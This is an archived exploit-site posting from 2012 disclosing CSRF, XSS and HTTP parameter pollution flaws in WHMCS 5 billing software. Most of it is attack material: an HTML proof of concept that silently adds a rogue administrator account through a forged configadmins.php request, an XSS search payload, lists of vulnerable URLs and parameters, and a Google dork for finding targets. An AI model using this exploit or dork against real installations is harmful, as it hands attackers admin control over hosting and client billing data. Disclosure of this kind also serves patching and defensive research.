Profile image for mrk studios Shadman Tanjim on May 30, 2012
WHMCS version5 suffers from cross site request forgery, HTTP parameter pollution, and cross site scripting vulnerabilities.
Platforms
na
Category
webapps
Tags
exploit web vulnerability xss csrf
Source
packetstormsecurity.org
Download
Exploit Code

WHMCS 5 Cross Site Request Forgery / Cross Site Scripting


##########################################################################################################################
# Title: WHMCS 5 Multiple CSRF (Add Admin) and XSS Vulnerability
# Version: Latest version 5.1 and other previous version maybe vulnerable 
# Vendor: www.whmcs.com
# Date: 2012-05-30
# Tested on: win/linux
# Author/Found by: Shadman Tanjim
# Email: shadman2600@gmail.com
# Greetz: Sayem Islam, Shahee Mirza, JingoBD, ManInDark, Rohit And All Crew and Members of Bangladesh Cyber Army.
# Special Thanks: x8631p 
# Google Dork: "Powered by WHMCompleteSolution"  or  inurl:WHMCS 
############################################################################################################################

CSRF Vulnerability:

Get:
http://site.com/clientarea.php 
http://site.com/admin/index.php 
http://site.com/admin/login.php 

Post:
http://site.com/admin/login.php
http://site.com/cart.php
http://site.com/admin/configadmins.php
http://site.com/pwreset.php


p0c:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<h2>WHMCS CSRF ExpL0iT PoC</h2>
</head>
<script  language="javascript" type="text/javascript" >

    function lifeissimple() {

        var token = "Token Value";

        var img = document.createElement("img");
        var site="http://www.localhost.com:80";
        var requesturl = site + "/billing/admin/configadmins.php?action=save&amp;id=&amp;token=" + token + "&amp;roleid=1&amp;firstname=dead&amp;lastname=cow&amp;email=deadcow@deadcow.com&amp;username=deadcow&amp;password=deadcow&amp;password2=deadcow&amp;deptids[]=4&amp;deptids[]=1&amp;signature=deadcow&amp;notes=deadcow&amp;template=blend&amp;language=English";
        img.setAttribute("src", requesturl);
        document.body.appendChild(img);

       var img2 = document.createElement("img");
       img2.setAttribute("src", site+"/billing/admin/configadmins.php?added=true&amp;");
       document.body.appendChild(img);
}

</script>
<body onload="lifeissimple();">

</body>
</html>


Cross-site Scripting (XSS) Vulnerability: 

request:POST http://site.com/knowledgebase.php?action=search HTTP/1.1
Content-Type: application/x-www-form-urlencoded

search='%20onerror%3D'f(PSRyh)


HTTP Parameter Pollution :

1.Affected link: http://site.com/cart.php?a=add&amp;domain=transfer&amp;n913620=v992636
Affected parameter: a=add

2. Affected link: http://site.com/domainchecker.php?search=bulkregister&amp;n946774=v992350
Affected parameter: search=bulkregister

3. Affected link: http://site.com/cart.php?currency=2&amp;gid=1&amp;n972751=v976696
Affected parameter: currency=2

Comments

blog comments powered by Disqus